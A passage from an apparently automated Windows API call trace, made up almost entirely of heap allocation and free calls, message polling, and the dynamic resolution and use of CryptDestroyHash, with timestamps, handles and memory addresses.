dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0184.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0184.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0184.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0184.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0184.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0184.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0184.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0184.316] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0184.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0184.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0184.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0184.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0184.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0184.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0184.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0184.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ad0 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b00 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509e0 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b18 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0184.318] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0184.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bc0 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0184.318] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0184.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0184.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0184.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0184.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0184.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0184.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0184.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0184.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0184.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0184.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0184.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0184.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0184.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0184.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0184.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0184.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0184.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0184.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0184.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0184.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0184.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0184.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0184.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0184.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a08 [0184.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0184.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0184.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0184.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0184.381] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0184.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0184.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0184.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0184.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0184.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0184.381] CryptDestroyHash (hHash=0xa875d0) returned 1 [0184.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0184.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0184.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0184.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0184.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0184.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0184.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0184.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0184.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0184.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0184.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0184.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0184.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0184.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0184.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0184.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0184.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0184.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0184.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0184.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0184.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0184.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0184.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0184.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0184.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0184.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0184.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0184.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0184.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 